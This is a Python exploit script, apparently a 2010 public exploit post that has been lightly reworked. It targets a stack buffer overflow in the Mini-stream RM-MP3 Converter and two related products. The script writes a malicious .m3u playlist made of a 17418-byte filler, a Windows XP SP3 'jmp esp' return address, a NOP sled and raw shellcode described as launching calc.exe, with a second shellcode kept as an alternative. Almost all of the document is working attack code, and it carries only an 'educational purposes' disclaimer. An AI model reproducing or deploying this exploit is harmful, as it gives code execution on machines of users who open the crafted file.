
# Title : Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
# Published : 2010-08-02
# Author : Praveen Darshanam


####################################################################################
# Exploit Title: Mini-stream RM-MP3 Converter/WMDownloader/ASX to MP3 Converter Stack Buffer Overflow Exploit
#
# Tested on Windows XP SP3 Pro (the kernel32.dll "jmp esp" address used below is specific to this OS build)
# Found By : Cyber-Zone (ABDELKHALEK)
# http://www.securityfocus.com/bid/34494
# This exploit is written slightly differently from the one referenced above.
# Refer: http://downloads.securityfocus.com/vulnerabilities/exploits/34494-2.pl
# Download product : http://www.rm-to-mp3.net/downloads/WMDownloader.exe
#         http://www.rm-to-mp3.net/downloads/Mini-streamRM-MP3Converter.exe
#         http://www.rm-to-mp3.net/downloads/ASXtoMP3Converter.exe
# THIS EXPLOIT WORKS FOR ALL THE 3 INSTALLERS ABOVE
# corelanc0d3r: Greetz from INDIA
# My First BoF Exploit
# Author: Praveen Darshanam
# Contact: praveen_recker@sify.com
# Blog: http://darshanams.blogspot.com
#
# This was written strictly for educational purposes. Use it at your own risk.
# The author will not bear responsibility for any damages whatsoever.
#
# Vinod, wish u happy journey :) ..... enjoy maadi !!!
####################################################################################

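import struct

# ---------------------------------------------------------------------------
# Payload layout
#
# The bug is a stack buffer overflow triggered by an over-long entry in an
# .m3u playlist.  The entry written to disk is laid out as:
#
#   handler | buff1 (filler up to the saved return address) | eip | noop |
#   code2exec | buff2 (filler up to the fixed total length)
#
# Every piece is a byte string and the file is opened in binary mode: a
# text-mode open would newline-translate (Windows) or re-encode (Python 3)
# bytes >= 0x80 and silently corrupt the payload on disk.
# ---------------------------------------------------------------------------

handler = b"ftp://"

# 17418 filler bytes reach the saved return address.  This offset was found by
# the author on the product versions listed in the header; re-verify it on any
# other build before relying on it.
buff1 = b"D" * 17418

# Overwritten return address: a "jmp esp" gadget, packed little-endian.
#   0x1004A57D  jmp esp  C:\Program Files\Mini-stream\WM Downloader\WDfilter01.dll
#               (the author reports this product-local address did NOT work for him)
#   0x7C86467B  jmp esp  kernel32.dll on Windows XP SP3 — OS-build specific; a
#               different service pack or language edition needs another address.
eip = struct.pack("<I", 0x7C86467B)

# Both shellcodes pop calc.exe.  code2exec is the one that is used; the
# alternative is kept for reference.  NOTE(review): the M3U file is line
# oriented, so a 0x0a/0x0d inside the entry is likely to truncate it — the
# active shellcode contains neither, the alternative contains 0x0d (confirm
# before switching to it).
code2exec = (
    b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24"
    b"\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78"
    b"\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5"
    b"\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed"
    b"\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca"
    b"\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27"
    b"\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a"
    b"\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83"
    b"\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6"
    b"\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d"
    b"\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87"
    b"\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca"
)

# Alternative calc.exe shellcode (not used by default, see the note above).
code2exec_alt = (
    b"\x31\xc9\xda\xd4\xb1\x33\xbd\xec\x71\x94\xde\xd9"
    b"\x74\x24\xf4\x5f\x31\x6f\x15\x03\x6f\x15\x83\x2b"
    b"\x75\x76\x2b\x4f\x9e\xff\xd4\xaf\x5f\x60\x5c\x4a"
    b"\x6e\xb2\x3a\x1f\xc3\x02\x48\x4d\xe8\xe9\x1c\x65"
    b"\x7b\x9f\x88\x8a\xcc\x2a\xef\xa5\xcd\x9a\x2f\x69"
    b"\x0d\xbc\xd3\x73\x42\x1e\xed\xbc\x97\x5f\x2a\xa0"
    b"\x58\x0d\xe3\xaf\xcb\xa2\x80\xed\xd7\xc3\x46\x7a"
    b"\x67\xbc\xe3\xbc\x1c\x76\xed\xec\x8d\x0d\xa5\x14"
    b"\xa5\x4a\x16\x25\x6a\x89\x6a\x6c\x07\x7a\x18\x6f"
    b"\xc1\xb2\xe1\x5e\x2d\x18\xdc\x6f\xa0\x60\x18\x57"
    b"\x5b\x17\x52\xa4\xe6\x20\xa1\xd7\x3c\xa4\x34\x7f"
    b"\xb6\x1e\x9d\x7e\x1b\xf8\x56\x8c\xd0\x8e\x31\x90"
    b"\xe7\x43\x4a\xac\x6c\x62\x9d\x25\x36\x41\x39\x6e"
    b"\xec\xe8\x18\xca\x43\x14\x7a\xb2\x3c\xb0\xf0\x50"
    b"\x28\xc2\x5a\x3e\xaf\x46\xe1\x07\xaf\x58\xea\x27"
    b"\xd8\x69\x61\xa8\x9f\x75\xa0\x8d\x40\x94\x61\xfb"
    b"\xe8\x01\xe0\x46\x75\xb2\xde\x84\x80\x31\xeb\x74"
    b"\x77\x29\x9e\x71\x33\xed\x72\x0b\x2c\x98\x74\xb8"
    b"\x4d\x89\x16\x5f\xde\x51\xf7\xfa\x66\xf3\x07"
)

# NOP sled between the return address and the shellcode.  After "jmp esp"
# execution lands right behind the overwritten return address, so only a few
# bytes are needed (the author notes that 4 would be enough).
noop = b"\x90" * 10

# Total length of the playlist entry; whatever is left after the fixed prefix
# is filled with "Z".
TOTAL_LEN = 40000
OUTPUT_FILE = "wmdownloader_codeexec.m3u"


def build_payload(total_len=TOTAL_LEN):
    """Return the malicious playlist entry as a byte string.

    total_len: overall length of the entry.  The fixed prefix (handler, buff1,
               eip, noop, code2exec) is padded with "Z" up to this length.
    Raises ValueError if total_len is shorter than the fixed prefix, instead
    of silently emitting a truncated payload.
    """
    prefix = handler + buff1 + eip + noop + code2exec
    pad_len = total_len - len(prefix)
    if pad_len < 0:
        raise ValueError(
            "total_len %d is smaller than the fixed payload (%d bytes)"
            % (total_len, len(prefix))
        )
    buff2 = b"Z" * pad_len
    return prefix + buff2


def main():
    """Write the payload to OUTPUT_FILE and report the outcome on stdout."""
    payload = build_payload()
    # Same figure the original script printed: the length of the trailing filler.
    print("code2exec offset is: %d" % (TOTAL_LEN - len(handler) - len(buff1)
                                        - len(eip) - len(noop) - len(code2exec)))
    try:
        # Binary mode: no newline translation, no text encoding of the payload.
        with open(OUTPUT_FILE, "wb") as out:
            out.write(payload)
    except IOError as err:
        # Only file-system failures are expected here; report the reason
        # instead of hiding it behind a bare except.
        print("\n[+] Unable to create file . . . (%s)\n" % err)
        return
    print("\n\n[+] Coded by Praveen Darshanam")
    print("[+] Malicious M3U File Successfully created\n\n")


if __name__ == "__main__":
    main()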